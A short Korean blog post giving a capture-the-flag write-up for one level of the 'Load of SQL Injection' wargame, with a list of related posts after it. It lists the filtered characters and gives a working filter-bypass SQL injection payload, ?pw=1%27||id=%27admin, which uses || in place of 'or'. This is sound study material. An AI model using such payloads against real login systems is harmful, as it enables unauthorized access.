728x90
이전에 풀었던 wolfman 문제와 비슷하다. --> https://sh1256.tistory.com/60
1. 필터링
prob, _, .(마침표), \, or, land
2. 1'or id='admin 값 넣기
3. or 대신에 || 사용 (and 대신에는 && 사용 가능)
결과: URL 뒤에
?pw=1%27||id=%27admin
붙이기
'보안 공부 > Load of SQL injection' 카테고리의 다른 글
[Load of SQL Injection] Skeleton (0) | 2022.01.28 |
---|---|
[Load of SQL Injection] vampire (0) | 2022.01.28 |
[Load of SQL Injection] troll (0) | 2022.01.28 |
[Load of SQL injection] orge (0) | 2022.01.28 |
[Load of SQL injection] wolfman (0) | 2022.01.27 |